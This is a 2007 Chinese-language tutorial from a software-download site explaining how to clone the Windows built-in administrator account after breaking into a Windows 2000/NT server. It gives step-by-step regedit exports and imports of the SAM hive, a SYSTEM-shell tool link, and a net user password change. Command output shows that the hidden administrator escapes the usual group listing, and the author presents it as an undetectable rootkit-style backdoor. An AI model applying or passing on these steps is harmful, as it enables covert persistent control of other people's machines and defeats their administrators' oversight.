文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | firefox | WPS | 杀毒软件 | Picasa
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形图像 办公软件 媒体动画 精文荟萃 常用软件 网页编程 技术开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术如何克隆管理员帐号
精品推荐
特别推荐
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
·黑客攻击的几种常用手法及防御技巧
·经典常见计算机密码破解实用手册
·经典总结:各个网络端口的入侵
·最详细的黑客入门法则
·Telnet高级入侵攻略及原理
·攻防技巧PHP数据库安全之SQL注入
热点TOP10
·最详细的黑客入门法则
·我是怎么进入他人计算机的
·“黑客”教你如何远程控制计算机
·流光5.0使用小窍门
·经典常见计算机密码破解实用手册
·黑客破解电脑密码实用技巧大全!
·Telnet高级入侵攻略及原理
·菜鸟变黑客高手
·从零开始学黑客:网络黑客新手入门指南
·让XP-SP2肉鸡支持远程多用户登陆
·不用任何软件(木马程序)盗取账号密码
·流光教程一
·Windows黑客编程基础
·黑客技术之知道对方IP入侵别人的电脑
·经典:各个网络端口的入侵方法
·收费网站破解攻略
·后门程序知识完全解析
·从“头到脚” 教你溢出网吧收银台
·谁能知道微软在你的计算机里隐藏的秘密
·HONEYPOT(蜜罐)技术

如何克隆管理员帐号

日期:2007年6月26日 作者: 查看:[大字体 中字体 小字体]


经常看到一些人在入侵一台windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F4"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的"1F4"修改为"3E9"后执行
regedit /s adam.reg
导入该Reg文件

然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

OK,大功告成...

这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
C:\>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted Access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed sUCcessfully.

再看看USER2SID的输出结果:
C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

^_^,这算不算RootKit...

附:
1、感谢叮叮付出需要reinstall OS的代价...
2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持... 

(出处:清风下载学院






上一篇:WINDOWS的注册表中一共藏有三个密码

下一篇:如何获取passwd密码档

如何克隆管理员帐号 相关文章:
·QQ挂号升级方法
·让指定QQ号码无法登陆的技巧
·注册5连号QQ
·盗QQ号码方法大全
·腾讯QQ号码使用完全指南
·腾讯(国外QQ)靓号申请,使用,下载方法
·不用任何软件(木马程序)盗取账号密码
·更改Windows XP操作系统序列号
·教你申请Windows Server 2008序列号
·CPU型号大全总结
如何克隆管理员帐号 相关软件:
·AUTOCAD2004序列号生成器
·手机SIM卡备份一卡多号(手机魔卡)万能读写软件V9.0
·微软正版验证工具(Windows XP/2003 序列号更换工具)
·4号解剖室
·杀手代号47
·《代号十三》 XIII 硬盘版 动作射击
·瑞士账号
·极品飞车 9 头号通缉黑名单 完全版
·三角洲特种部队之黑鹰坠落 序列号生成器
·QQ号码申请精灵v1.2 b30121

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:vipcn